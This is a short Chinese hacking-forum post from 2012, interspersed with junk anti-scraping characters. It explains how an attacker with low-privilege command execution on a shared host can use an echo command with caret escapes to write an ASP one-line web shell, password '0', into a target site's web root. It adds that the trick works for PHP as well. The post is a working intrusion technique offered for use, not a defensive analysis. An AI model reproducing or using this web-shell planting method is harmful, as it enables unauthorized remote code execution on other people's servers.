在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。1 v$ H8 k+ }1 \
- S/ }) E7 l7 n: I5 d0 W5 k命令格式) Y- V% G# z; Z! C" |, Q
x+ T* e+ b2 m. t) J+ xEcho 语句 >目标站绝对目录
2 C! Z- B3 F9 A6 T7 P* p9 m; f8 j! J4 R- M4 P7 X, \0 D. b
例如: / H& F) D8 `! d
/ P+ Y$ @9 a9 ^echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
: \7 M) Q+ d9 E/ D. B6 E
: p/ M Y) w8 M( c6 m) D这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。! ]4 u6 D2 D3 x6 [- L: K
|
发表于 2012-9-23 14:40:24
收藏
支持
反对